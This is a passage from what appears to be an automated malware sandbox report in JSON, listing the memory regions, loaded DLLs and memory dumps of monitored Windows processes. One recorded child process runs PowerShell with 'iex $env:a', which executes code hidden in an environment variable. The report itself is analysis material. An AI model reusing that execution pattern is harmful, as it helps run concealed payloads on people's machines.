"timestamp": "00:00:37.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 344064, "start_va": 8791603871744, "type": "region", "version": 1 }, "end_va": 8791604215807, "entry_point": 8791603871744, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_328", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 8791603871744, "timestamp": "00:00:37.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 32116735, "entry_point": 32112640, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_329", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 32112640, "timestamp": "00:00:37.681", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000330-addr_0x0000000001ed0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_64", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32833535, "entry_point": 0, "filename": null, "id": "region_330", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:00:37.686", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791743266816, "type": "region", "version": 1 }, "end_va": 8791743361023, "entry_point": 8791743266816, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_331", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791743266816, "timestamp": "00:00:37.686", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000332-addr_0x000007fffffd6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, "filename": null, "id": "region_332", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:00:37.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791740121088, "type": "region", "version": 1 }, "end_va": 8791740411903, "entry_point": 8791740121088, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_333", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791740121088, "timestamp": "00:00:37.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791750541312, "type": "region", "version": 1 }, "end_va": 8791750623231, "entry_point": 8791750541312, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_334", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791750541312, "timestamp": "00:00:37.709", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000335-addr_0x00000000027d0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 41746432, "type": "region", "version": 1 }, "end_va": 42270719, "entry_point": 0, "filename": null, "id": "region_335", "name": "private_0x00000000027d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41746432, "timestamp": "00:00:37.722", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000336-addr_0x0000000002850000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 42270720, "type": "region", "version": 1 }, "end_va": 42795007, "entry_point": 0, "filename": null, "id": "region_336", "name": "private_0x0000000002850000", "norm_filename": null, "region_type": "private_memory", "start_va": 42270720, "timestamp": "00:00:37.723", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 593920, "start_va": 8791749623808, "type": "region", "version": 1 }, "end_va": 8791750217727, "entry_point": 8791749623808, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_337", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 8791749623808, "timestamp": "00:00:37.723", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000338-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_338", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:00:37.731", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000339-addr_0x000007fffffd4000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092850175, "entry_point": 0, "filename": null, "id": "region_339", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:00:37.731", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 42795008, "type": "region", "version": 1 }, "end_va": 46936063, "entry_point": 0, "filename": null, "id": "region_340", "name": "pagefile_0x00000000028d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42795008, "timestamp": "00:00:37.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 929792, "start_va": 8791592271872, "type": "region", "version": 1 }, "end_va": 8791593201663, "entry_point": 8791592271872, "filename": "\\Windows\\System32\\jscript.dll", "id": "region_341", "name": "jscript.dll", "norm_filename": "c:\\windows\\system32\\jscript.dll", "region_type": "memory_mapped_file", "start_va": 8791592271872, "timestamp": "00:00:37.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 8791604264960, "type": "region", "version": 1 }, "end_va": 8791616548863, "entry_point": 8791604264960, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_342", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 8791604264960, "timestamp": "00:00:37.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 163840, "start_va": 8791599480832, "type": "region", "version": 1 }, "end_va": 8791599644671, "entry_point": 8791599480832, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_343", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 8791599480832, "timestamp": "00:00:37.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791702962176, "type": "region", "version": 1 }, "end_va": 8791703060479, "entry_point": 8791702962176, "filename": "\\Windows\\System32\\mpr.dll", "id": "region_344", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 8791702962176, "timestamp": "00:00:37.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791755587584, "type": "region", "version": 1 }, "end_va": 8791769776127, "entry_point": 8791755587584, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_345", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791755587584, "timestamp": "00:00:37.899", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791595089920, "type": "region", "version": 1 }, "end_va": 8791595302911, "entry_point": 8791595089920, "filename": "\\Windows\\System32\\scrrun.dll", "id": "region_346", "name": "scrrun.dll", "norm_filename": "c:\\windows\\system32\\scrrun.dll", "region_type": "memory_mapped_file", "start_va": 8791595089920, "timestamp": "00:00:38.485", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 81920, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 32260095, "entry_point": 32182384, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_347", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 32178176, "timestamp": "00:00:38.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 46989312, "type": "region", "version": 1 }, "end_va": 59273215, "entry_point": 46996440, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_348", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 46989312, "timestamp": "00:00:38.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 32833536, "type": "region", "version": 1 }, "end_va": 32841727, "entry_point": 0, "filename": null, "id": "region_349", "name": "pagefile_0x0000000001f50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32833536, "timestamp": "00:00:38.617", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000350-addr_0x0000000003890000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 59310080, "type": "region", "version": 1 }, "end_va": 60358655, "entry_point": 0, "filename": null, "id": "region_350", "name": "private_0x0000000003890000", "norm_filename": null, "region_type": "private_memory", "start_va": 59310080, "timestamp": "00:00:38.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 32964607, "entry_point": 32903268, "filename": "\\Windows\\System32\\scrrun.dll", "id": "region_352", "name": "scrrun.dll", "norm_filename": "c:\\windows\\system32\\scrrun.dll", "region_type": "memory_mapped_file", "start_va": 32899072, "timestamp": "00:00:38.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33492991, "entry_point": 0, "filename": null, "id": "region_353", "name": "pagefile_0x0000000001ff0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33488896, "timestamp": "00:00:38.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791727276032, "type": "region", "version": 1 }, "end_va": 8791728504831, "entry_point": 8791727276032, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_354", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791727276032, "timestamp": "00:00:38.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 33562623, "entry_point": 0, "filename": null, "id": "region_355", "name": "pagefile_0x0000000002000000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33554432, "timestamp": "00:00:38.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 33636351, "entry_point": 33619968, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_356", "name": "cversions.1.db", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 33619968, "timestamp": "00:00:38.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 33685504, "type": "region", "version": 1 }, "end_va": 33882111, "entry_point": 33685504, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000010.db", "id": "region_357", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db", "region_type": "memory_mapped_file", "start_va": 33685504, "timestamp": "00:00:38.674", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 34406400, "type": "region", "version": 1 }, "end_va": 34410495, "entry_point": 0, "filename": null, "id": "region_358", "name": "pagefile_0x00000000020d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34406400, "timestamp": "00:00:38.675", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000359-addr_0x0000000003990000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 60358656, "type": "region", "version": 1 }, "end_va": 61411327, "entry_point": 0, "filename": null, "id": "region_359", "name": "private_0x0000000003990000", "norm_filename": null, "region_type": "private_memory", "start_va": 60358656, "timestamp": "00:00:38.678", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791750672384, "type": "region", "version": 1 }, "end_va": 8791750733823, "entry_point": 8791750672384, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_362", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791750672384, "timestamp": "00:00:38.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 33636351, "entry_point": 33619968, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_363", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 33619968, "timestamp": "00:00:38.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 34471936, "type": "region", "version": 1 }, "end_va": 34668543, "entry_point": 34471936, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", "id": "region_364", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db", "region_type": "memory_mapped_file", "start_va": 34471936, "timestamp": "00:00:38.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34684927, "entry_point": 34668544, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_365", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 34668544, "timestamp": "00:00:38.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 40960000, "type": "region", "version": 1 }, "end_va": 41377791, "entry_point": 40960000, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_366", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 40960000, "timestamp": "00:00:38.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791751393280, "type": "region", "version": 1 }, "end_va": 8791751614463, "entry_point": 8791751393280, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_367", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791751393280, "timestamp": "00:00:38.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791751655424, "type": "region", "version": 1 }, "end_va": 8791751761919, "entry_point": 8791751655424, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_368", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791751655424, "timestamp": "00:00:38.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791769808896, "type": "region", "version": 1 }, "end_va": 8791771738111, "entry_point": 8791769808896, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_369", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791769808896, "timestamp": "00:00:38.723", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000679-addr_0x0000000003a10000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 60882944, "type": "region", "version": 1 }, "end_va": 61407231, "entry_point": 0, "filename": null, "id": "region_679", "name": "private_0x0000000003a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 60882944, "timestamp": "00:00:47.676", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000680-addr_0x000007fffffac000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092678144, "type": "region", "version": 1 }, "end_va": 8796092686335, "entry_point": 0, "filename": null, "id": "region_680", "name": "private_0x000007fffffac000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092678144, "timestamp": "00:00:47.677", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" iex $env:a", "filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_3", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000370-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_74", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_370", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:38.751", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000371-addr_0x0000000000030000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_75", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 262143, "entry_point": 0, "filename": null, "id": "region_371", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:38.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_372", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:38.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_373", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:38.754", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_374", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:38.754", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000375-addr_0x0000000000150000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_76", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_375", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:00:38.755", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000376-addr_0x0000000000220000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_77", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_376", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:00:38.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 466944, "start_va": 575995904, "type": "region", "version": 1 }, "end_va": 576462847, "entry_point": 575995904, "filename": "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_377", "name": "powershell.exe", "norm_filename": "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 575995904, "timestamp": "00:00:38.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2000158720, "type": "region", "version": 1 }, "end_va": 2001899519, "entry_point": 2000158720, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_378", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2000158720, "timestamp": "00:00:38.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2002124800, "type": "region", "version": 1 }, "end_va": 2003697663, "entry_point": 2002124800, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_379", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002124800, "timestamp": "00:00:38.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_380", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:38.763", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000381-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_78", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_381", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": 